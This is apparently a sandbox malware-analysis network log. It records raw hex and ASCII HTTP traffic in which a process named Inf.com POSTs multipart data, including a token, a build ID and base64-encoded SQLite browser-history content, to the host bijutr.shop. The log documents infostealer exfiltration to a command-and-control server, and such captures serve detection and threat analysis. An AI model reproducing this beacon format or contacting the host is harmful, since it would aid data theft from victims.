                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                            Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                            Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                            Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                            Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                            Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            41192.168.2.650042188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----2N79HDJWBSJMYU37GVKF
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 207993
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 4e 37 39 48 44 4a 57 42 53 4a 4d 59 55 33 37 47 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 37 39 48 44 4a 57 42 53 4a 4d 59 55 33 37 47 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 37 39 48 44 4a 57 42 53 4a 4d 59 55 33 37 47 56 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------2N79HDJWBSJMYU37GVKFContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------2N79HDJWBSJMYU37GVKFContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------2N79HDJWBSJMYU37GVKFCont
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                            Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                            2024-12-27 06:11:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            42192.168.2.650050188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AAA1NGVKNGV37Y58Q9RI
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 68733
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 31 4e 47 56 4b 4e 47 56 33 37 59 35 38 51 39 52 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------AAA1NGVKNGV37Y58Q9RIContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------AAA1NGVKNGV37Y58Q9RIContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------AAA1NGVKNGV37Y58Q9RICont
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
